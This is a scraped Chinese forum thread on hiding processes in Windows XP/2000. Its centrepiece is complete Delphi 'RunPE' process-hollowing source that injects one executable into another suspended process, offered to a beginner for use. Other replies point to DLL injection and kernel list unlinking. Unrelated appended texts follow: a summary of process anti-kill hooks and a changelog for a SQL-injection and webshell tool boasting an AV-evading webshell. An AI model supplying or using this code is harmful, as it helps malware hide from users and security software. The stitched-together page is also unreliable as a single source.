如何在XP和2000下隐藏进程??

tzmcc 2011-02-21 10:05:49
本人是菜鸟,希望能解答详细些呵。
...全文
188 4 打赏 收藏 转发到动态 举报
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
keeley20 2011-02-24
  • 打赏
  • 举报
回复
隐藏进程的方法不止一个,但是基本都被杀软查杀,楼主使用的使用要想清楚。

这里给个以前用过的代码
uRunPE单元

unit uRunPE;

interface

uses Windows;

type
TByteArray = array of Byte;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

procedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
CopyMemory(Destination, Source, dLength);
end;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
IDH: TImageDosHeader;
INH: TImageNtHeaders;
ISH: TImageSectionHeader;
PI: TProcessInformation;
SI: TStartUpInfo;
CONT: TContext;
ImageBase: Pointer;
Ret: DWORD;
i: integer;
Addr: DWORD;
dOffset: DWORD;
begin
Result := FALSE;
try
Move(@IDH, @bFile[0], 64);
if IDH.e_magic = IMAGE_DOS_SIGNATURE then
begin
Move(@INH, @bFile[IDH._lfanew], 248);
if INH.Signature = IMAGE_NT_SIGNATURE then
begin
FillChar(SI, SizeOf(TStartupInfo),#0);
FillChar(PI, SizeOf(TProcessInformation),#0);
SI.cb := SizeOf(TStartupInfo);
if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
begin
CONT.ContextFlags := CONTEXT_FULL;
if GetThreadContext(PI.hThread, CONT) then
begin
ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
NtUnmapViewOfSection(PI.hProcess, @Addr);
ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
dOffset := IDH._lfanew + 248;
for i := 0 to INH.FileHeader.NumberOfSections - 1 do
begin
Move(@ISH, @bFile[dOffset + (i * 40)], 40);
WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
end;
WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
asm
pushad
mov eax,$00401000
mov ebp,esp
sub edx,$00010000
popad
end;
SetThreadContext(PI.hThread, CONT);
ResumeThread(PI.hThread);
Result := TRUE;
end;
end;
end;
end;
except
CloseHandle(PI.hProcess);
CloseHandle(PI.hThread);
end;
end;

end.



使用例子:
program RunPE;

uses
Windows,
uRunPE;

var
bBuff: TByteArray;

{$R 1.res}

function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
var
hFile: THandle;
dSize: DWORD;
dRead: DWORD;
begin
Result := FALSE;
hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
if hFile <> INVALID_HANDLE_VALUE then
begin
dSize := GetFileSize(hFile, nil);
SetLength(bFile, dSize);
ReadFile(hFile, bFile[0], dSize, dRead, nil);
CloseHandle(hFile);

if dRead = dSize then
Result := TRUE;
end;
end;

begin
if FileToBytes('notepad.exe', bBuff) then
RunExe(ParamStr(0), bBuff);
end.

上面的例子是把记事本程序在runpe.exe中执行。
crack1946 2011-02-24
  • 打赏
  • 举报
回复
注入其他进程好了,一般是一个DLL,只记得好像有一个 CreateRemoteThread函数
gyk120 2011-02-23
  • 打赏
  • 举报
回复
最简单的是注入系统进程……改双向链表比较麻烦
Lactoferrin 2011-02-21
  • 打赏
  • 举报
回复
xp 2000用NtSystemDebugControl可以实现,但这个在windows vista就被封了
09年初刚到现在这家公司,头让做一个进程防杀的功能,为了保护我们的软件的服务程序,类似360或瑞星这样的安全产品都有进程防杀的功能。研究了一个多月,总结网上的各种防杀方法并参考其代码,特此将各种实现方法归纳为以下6种,并将其对应源码奉上。 源码全部经过自己修改调试,部分为原创,在vs2005下调试通过,在各种windows操作系统下测试过 1. ring3提升线程为系统线程 原理:windows在强制结束进程的时候会先结束掉所有的线程,把程序的线程改成系统线程,就可以达到防杀的目的 优点:ring3实现的进程防杀,无驱动无hook,原理及代码都较为简单,能防止任务管理器杀掉进程 缺点:只能下xp下有效(与xp打的补丁也有关,有的xp系统会失败)防杀能力有限,例如不能防住IceSword等工具 该方法是参考了csdn一位朋友的做法,原文地址为 http://blog.csdn.net/KeSummer/archive/2008/05/18/2455379.aspx 2.hookApi之NtQuerySystemInformation 原理:hook NtQuerySystemInformation 来隐藏进程 优点:ring3实现的进程隐藏,无驱动,能在任务管理器里隐藏进程 缺点:只能在nt2000下隐藏进程,通用性较差 3.detours库实现进程防杀 原理:和2类似,hook OpenProcess 来防杀进程 优点:防杀能力和通用性都较强,在nt2000,xp,2003均可防杀 缺点:hookApi是用detours库来实现的,2008下防杀失败,不能防住某些进程工具 4.hook任务管理器结束进程事件 原理:挂钩任务管理器窗口,利用CBT钩子拦截结束进程消息 优点:通用性较强,任意的windows平台均可防止任务管理器杀进程 缺点:只能针对windows任务管理起到防杀作用 5.双进程保护 原理:主进程和守护进程互相监控,发现对方不在就启动对方。为了避免父子进程关系,主进程启动临时进程,临时进程启动守护进程 优点:通用性较强,保护能力较强,可保护windows服务程序。hook防杀需要主程序和桌面交互的,而服务程序是不和桌面交互的 缺点:非真正的防杀,只是杀了又启,手段有点不入流 6.驱动级进程保护 原理:驱动级的ZwQuerySystemInformation hook,来隐藏或防杀进程 优点:防杀能力较强,在IceSword 1.2.2版本下测试通过 缺点:加载有驱动,程序实现较为复杂,驱动级hook被360等杀毒工具检测为木马 yipihaoma qq:49489047
Domain4.3(明小子)10.10.10更新版主要更新内容如下: 1.驱除部分死连接,恢复部分官方连接 2.改变默认显示页面为本人BLOG 3.修正程序在检测时出错的BUG 4.修正程序在部分系统中无法启动的BUG 5.加了一个功能模块,但还不成熟,隐藏了,高手的话可以用OD调出来!>!< 6.修复前段时间一些朋友反映的错误和程序宏 7.增加四款SKN皮肤! 10.10.11紧急更新: 1.修正新版程序在部分系统中启动后直接导致系统蓝屏的BUG 2.修正域名查询的几个错误 3.修正程序批量检测查询到域名的时候无反映的BUG! Domain4.2(明小子)10.01.16更新版主要更新内容如下: 1.删除所有无关数据 2.优化急速代码 3.改变启动线程 4.增加SQL数据批量导出功能 5.加入几个优化进程模块,非后门.后台运行. 6.锁定主程序栏目宽和高,不在恢复 7.删除“辅助工具”模块中全部代码 8.修正XP SP3 程序下兼容问题 9.重新改写域名查询旁站线程 程序于2010年01月16号调试完毕! 提别提示:第4个功能只能运行在完整版的windows XP 平台系统中,其他平台无法运行,如果出现恢复按钮并不能保存请自行调试与本程序无关.谢谢合作! 宝宝的话:有朋友们的鼓励才会有这个版本的发布,这当是我送给大家2010年里的第一个礼物吧。 Domain4.1(明小子)0901更新版主要更新内容如下: 1.增加新系统兼容模块,全面兼容2000-2008各系统 (部分精简版系统除外) 2.优化网站打开速度,删减部分无用内核信息,全面加快程序启动速度. 3.基于09.05.20号内核提升,改变搜查循环的一个死BUG! 4.删除在0520上增加的一个补针函数,并使用新的函数替换.保证不报错. 5.不在兼容xpsp3,因为没时间去修正这个错误。所以可能部分SP3系统运行不起来本程序 6.增加部分程序扩充空格代码,为下个版本更新做好铺垫 小提示:保留旧的IP反查连接系统,原因没有找到新的和稳定的IP反差服务器!如果有能提供的请与本人联系!谢谢合作 Domain4.1(明小子)0520更新版主要更新内容如下: 1.基于08.10.01号内核提升,修正一次关键错误。 2.替换原程序自带的那个小马,该为最新美化免杀版的小马! 3.添加一个服务器挂钩程序(非插件),使修改后的新内核兼容vista系统。 4.程序数据库默认名为:SetData.mdb 请大家使用3.5版本以上的MDB数据.其他低版本程序可能不兼容! 5.删除后台下载统计代码(以前没发现,本人也是从网站上面下的软件,排除作者自添加行为) 6.加了一个补针,针对sql注入功能中的一个小BUG。 7.删除了很多没有用的代码,最大限度的优化程序启动速度。 8.更新部分在xpsp3下出错的几个小BUG(小问题小解决,这个错误仅针对部分优化过度的XPSP3系统)。 提记:很多朋友说需要修改下程序IP域名查询功能,这里说明下.由于内核找不到关键句柄导致无法更新,下个版本在仔细看看! Domain4.0(明小子)1001更新版主要更新内容如下: 1.更新部分过度优化过的系统不兼容问题。 2.修改内存识别函数,使其降低软件在使用期间所占用的内存大小。 3.基于08.09.15号内核提升,修正因修改软件所出现的几个导致软件崩溃的几个BUG。 4.换了软件自带的那个垃圾皮肤。加入兼容美化皮肤!更美观! 5.兼容前版本数据库支持功能 6.去掉了没有用的PHP入侵选项和几处小BUG...... 转贴是一种美德!分享也是一种快乐,工具仅做辅助作用请勿用在非法用途上! 程序自带本BLOG连接,启动比较慢!不喜勿用!谢谢合作!

1,183

社区成员

发帖
与我相关
我的任务
社区描述
Delphi Windows SDK/API
社区管理员
  • Windows SDK/API社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧